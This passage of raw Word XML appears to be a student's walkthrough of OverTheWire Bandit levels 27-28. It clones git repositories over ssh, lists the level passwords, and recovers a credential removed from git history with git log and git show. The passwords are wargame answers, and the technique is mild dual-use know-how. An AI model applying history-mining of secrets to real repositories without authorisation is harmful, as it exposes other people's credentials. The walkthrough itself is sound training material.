          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote: Compressing objects: 100% (2/2), done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2179AC" w14:textId="77777777" w:rsidR="00C72A14" w:rsidRPr="00C72A14" w:rsidRDefault="00C72A14" w:rsidP="00C72A1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72A14">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote: Total 3 (delta 0), reused 0 (delta 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FD2F55" w14:textId="6A0D43EF" w:rsidR="00C72A14" w:rsidRDefault="00C72A14" w:rsidP="00C72A1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72A14">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Receiving objects: 100% (3/3), done.“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F41718" w14:textId="4426C371" w:rsidR="00C72A14" w:rsidRDefault="00C72A14" w:rsidP="00C72A1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4BF9D5B3" w14:textId="481D0B3B" w:rsidR="000C7309" w:rsidRDefault="00C72A14" w:rsidP="000C7309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I view</w:t>
      </w:r>
      <w:r w:rsidR="001D2C8A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the repository files using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>ls /tmp/samuelGit</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7309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 xml:space="preserve">and saw there was </w:t>
      </w:r>
      <w:r w:rsidR="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">a single file named </w:t>
      </w:r>
      <w:r w:rsidR="000C7309" w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>README</w:t>
      </w:r>
      <w:r w:rsidR="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. With the command </w:t>
      </w:r>
      <w:r w:rsidR="000C7309" w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat /tmp/samuelGit/README</w:t>
      </w:r>
      <w:r w:rsidR="000C7309" w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">I got the next level password: </w:t>
      </w:r>
      <w:r w:rsidR="000C7309" w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“The password to the next level is: </w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_Hlk21858347"/>
      <w:r w:rsidR="000C7309" w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0ef186ac70e04ea33b4c1853d2526fa2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="000C7309" w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18646990" w14:textId="5F328151" w:rsidR="00DB4A90" w:rsidRDefault="00DB4A90" w:rsidP="000C7309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2F97EF9F" w14:textId="16A8BE33" w:rsidR="00DB4A90" w:rsidRDefault="00DB4A90" w:rsidP="000C7309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DB4A90">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6295644C" w14:textId="6A158B44" w:rsidR="00DB4A90" w:rsidRDefault="00E82E1D" w:rsidP="000C7309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Like before:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001AFD06" w14:textId="2B8C58F1" w:rsidR="00E82E1D" w:rsidRPr="001D2C8A" w:rsidRDefault="00E82E1D" w:rsidP="001D2C8A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created a directory in tmp: </w:t>
      </w:r>
      <w:r w:rsidRPr="00372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>mkdir /temp/samuelGit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073B11D7" w14:textId="77777777" w:rsidR="00984B62" w:rsidRDefault="00984B62" w:rsidP="00E82E1D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26697C37" w14:textId="6637D6DF" w:rsidR="00E82E1D" w:rsidRDefault="001D2C8A" w:rsidP="00E82E1D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and</w:t>
      </w:r>
      <w:r w:rsidR="00E82E1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> cloned the repository using the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CF03D4" w14:textId="7C72C6E0" w:rsidR="00E82E1D" w:rsidRDefault="00E82E1D" w:rsidP="00E82E1D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372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>git clone ssh://bandit2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>-git@localhost/home/bandit2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>-git/repo /tmp/samuelGit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DED762C" w14:textId="77777777" w:rsidR="00984B62" w:rsidRDefault="00984B62" w:rsidP="00E82E1D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1BD2A692" w14:textId="00281D02" w:rsidR="00E82E1D" w:rsidRDefault="00E82E1D" w:rsidP="00E82E1D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I entered the password (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E82E1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>0ef186ac70e04ea33b4c1853d2526fa2</w:t>
      </w:r>
      <w:r w:rsidRPr="00372486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the</w:t>
      </w:r>
      <w:r w:rsidR="001D2C8A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753DAA71" w14:textId="77777777" w:rsidR="00E82E1D" w:rsidRPr="00E82E1D" w:rsidRDefault="00E82E1D" w:rsidP="00E82E1D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E82E1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“remote: Counting objects: 9, done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C0A244" w14:textId="77777777" w:rsidR="00E82E1D" w:rsidRPr="00E82E1D" w:rsidRDefault="00E82E1D" w:rsidP="00E82E1D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E82E1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote: Compressing objects: 100% (6/6), done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1DF63A" w14:textId="77777777" w:rsidR="00E82E1D" w:rsidRPr="00E82E1D" w:rsidRDefault="00E82E1D" w:rsidP="00E82E1D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E82E1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote: Total 9 (delta 2), reused 0 (delta 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7BDBA5" w14:textId="77777777" w:rsidR="00E82E1D" w:rsidRPr="00E82E1D" w:rsidRDefault="00E82E1D" w:rsidP="00E82E1D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E82E1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Receiving objects: 100% (9/9), done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E488AE" w14:textId="39DB426A" w:rsidR="00E82E1D" w:rsidRPr="00984B62" w:rsidRDefault="00E82E1D" w:rsidP="00984B6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E82E1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resolving deltas: 100% (2/2), done.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00794CE1" w14:textId="77777777" w:rsidR="0046200B" w:rsidRDefault="00003766" w:rsidP="00984B6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lastRenderedPageBreak/>
        <w:t xml:space="preserve">I entered the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00003766">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cd /tmp/samuelGit3</w:t>
      </w:r>
      <w:r w:rsidRPr="00003766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 xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00984B62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">viewed the repository files using the command </w:t>
      </w:r>
      <w:r w:rsidR="00984B62" w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">ls </w:t>
      </w:r>
      <w:r w:rsidR="00984B62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">and saw there was a single file named </w:t>
      </w:r>
      <w:r w:rsidR="00984B62" w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>README</w:t>
      </w:r>
      <w:r w:rsidR="00984B62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.md</w:t>
      </w:r>
      <w:r w:rsidR="00984B62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. With the command </w:t>
      </w:r>
      <w:r w:rsidR="00984B62" w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat README</w:t>
      </w:r>
      <w:r w:rsidR="00984B62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>.md</w:t>
      </w:r>
      <w:r w:rsidR="00984B62" w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984B62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>I got the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471270EE" w14:textId="4DDF096C" w:rsidR="00984B62" w:rsidRPr="00984B62" w:rsidRDefault="00984B62" w:rsidP="00984B6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0C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00984B62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># Bandit Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29834529" w14:textId="77777777" w:rsidR="00984B62" w:rsidRPr="00984B62" w:rsidRDefault="00984B62" w:rsidP="00984B6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984B62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Some notes for level29 of bandit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C01028C" w14:textId="77777777" w:rsidR="00984B62" w:rsidRPr="00984B62" w:rsidRDefault="00984B62" w:rsidP="00984B6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4422E6BA" w14:textId="7AF20FCC" w:rsidR="00984B62" w:rsidRPr="00984B62" w:rsidRDefault="00984B62" w:rsidP="001A7C79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984B62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>## credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA4697" w14:textId="77777777" w:rsidR="00984B62" w:rsidRPr="00984B62" w:rsidRDefault="00984B62" w:rsidP="00984B6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984B62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- username: bandit29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3BE11C" w14:textId="551D330F" w:rsidR="00984B62" w:rsidRDefault="00984B62" w:rsidP="00984B6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984B62">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- password: xxxxxxxxxx</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7309">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="001A7C79">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3CA4B5" w14:textId="1D87A0ED" w:rsidR="001A7C79" w:rsidRDefault="001A7C79" w:rsidP="00984B6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68A2F279" w14:textId="77777777" w:rsidR="002E0545" w:rsidRDefault="002E0545" w:rsidP="00984B6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After several tries, I decided to check the history of the commits by entering the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5618387C" w14:textId="5663CE3D" w:rsidR="00984B62" w:rsidRDefault="002E0545" w:rsidP="00984B62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2E0545">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>git log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, and got the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E899D9B" w14:textId="7D8C54BC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>“</w:t>
      </w:r>
      <w:r w:rsidRPr="002E0545">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>commit 073c27c130e6ee407e12faad1dd3848a110c4f95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10702757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>Author: Morla Porla &lt;morla@overthewire.org&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A1FAE4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>Date:   Tue Oct 16 14:00:39 2018 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622BED8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4E0018EB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 xml:space="preserve">    fix info leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C8CEE7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56B66476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  <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>commit 186a1038cc54d1358d42d468cdc8e3cc28a93fcb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E38D61D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>Author: Morla Porla &lt;morla@overthewire.org&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557AE8CE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>Date:   Tue Oct 16 14:00:39 2018 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6742119B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6CAA614A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 xml:space="preserve">    add missing data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6348FF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7EF434E0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  <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>commit b67405defc6ef44210c53345fc953e6a21338cc7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799D7832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>Author: Ben Dover &lt;noone@overthewire.org&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29191C10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>Date:   Tue Oct 16 14:00:39 2018 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43565C11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4BB94F88" w14:textId="7D03285D" w:rsid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 xml:space="preserve">    initial commit of README.md“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3071FD" w14:textId="46920101" w:rsid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6A3D5435" w14:textId="6464CE2D" w:rsid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Maybe the last commit was to hide the password! To display the last commit’s changes, I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="002E0545">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>git show 073c27c130e6ee407e12faad1dd3848a110c4f95</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, and got the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779B6085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>“</w:t>
      </w:r>
      <w:r w:rsidRPr="002E0545">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>commit 073c27c130e6ee407e12faad1dd3848a110c4f95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2B712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>Author: Morla Porla &lt;morla@overthewire.org&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C5DE9F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>Date:   Tue Oct 16 14:00:39 2018 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FA2C44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6980F083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 xml:space="preserve">    fix info leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1297BA31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61CEB327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>diff --git a/README.md b/README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BBD8B3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>index 3f7cee8..5c6457b 100644</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E753CB2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>--- a/README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A64131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>+++ b/README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1FEE69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  <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>@@ -4,5 +4,5 @@</w:t>
      </w:r>
      <w:r w:rsidRPr="002E0545">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Some notes for level29 of bandit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46584148" w14:textId="38C5CD8E" w:rsidR="002E0545" w:rsidRPr="002E0545" w:rsidRDefault="002E0545" w:rsidP="0026363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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> ## credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CD3AC7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</w:rPr>
        <w:t xml:space="preserve"> - username: bandit29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5654B30B" w14:textId="77777777" w:rsidR="002E0545" w:rsidRP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  <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>-- password: bbc96594b4e001778eee9975372716b2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A46759C" w14:textId="1318C046" w:rsid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E0545">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>+- password: xxxxxxxxxx</w:t>
      </w:r>
      <w:r w:rsidRPr="002E0545">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3794F4BA" w14:textId="687D5F5B" w:rsidR="002E0545" w:rsidRDefault="002E0545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2CC01375" w14:textId="7E7D428A" w:rsidR="002E0545" w:rsidRDefault="0046200B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[</w:t>
